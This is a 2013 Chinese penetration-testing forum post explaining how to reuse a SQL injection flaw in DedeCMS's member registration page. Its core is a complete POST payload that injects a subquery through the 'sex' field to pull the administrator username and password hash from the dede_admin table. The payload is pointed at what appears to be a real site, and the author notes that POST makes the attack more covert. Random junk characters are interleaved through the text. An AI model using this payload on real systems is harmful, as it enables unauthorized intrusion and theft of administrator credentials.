中国网络渗透测试联盟
标题:
织梦SQL注入漏洞再利用
[打印本页]
作者:
admin
时间:
2013-1-19 08:25
标题:
织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞
( I! U( ~6 D# `0 V
简要描述:
- |+ @& E# c: p& ?
. L0 R! J* @, _2 P) r: O; f
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
; w% S* j& v" R8 p: s$ n
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
$ Y9 v' r# a* m) R) q$ @
详细说明:跟这个漏洞
& D- P0 v- m0 [3 q& x
* I, V' p" N- S
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
; X/ u0 I" F5 P" t9 k! o, Z
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
5 [/ C4 J. ]4 m3 s, g; X% I2 Z
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
3 d+ c5 g6 n- X5 r. j
l" `/ R! F; z
www.political-security.com/member/reg_new.php
, R" i) b% x% L. [; { \, l" y
3 s; Z7 ]! U9 R0 k
POST
1 L- \- y6 D S1 m/ d, w* O4 B
& H7 q( I$ ^* `- Y6 s8 r/ r6 B) Y
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
K# Y8 J7 g0 {
userid=c4rp3nt3r&uname=c4rp3nt3r
6 c5 _4 F* y3 q& z( K
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
, C% |4 ~* {) F' L
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
P7 N+ G' t* Z8 ~- }
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
4 j. L9 X1 y: [# `4 r, x
%00&vdcode=glos&agree=
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2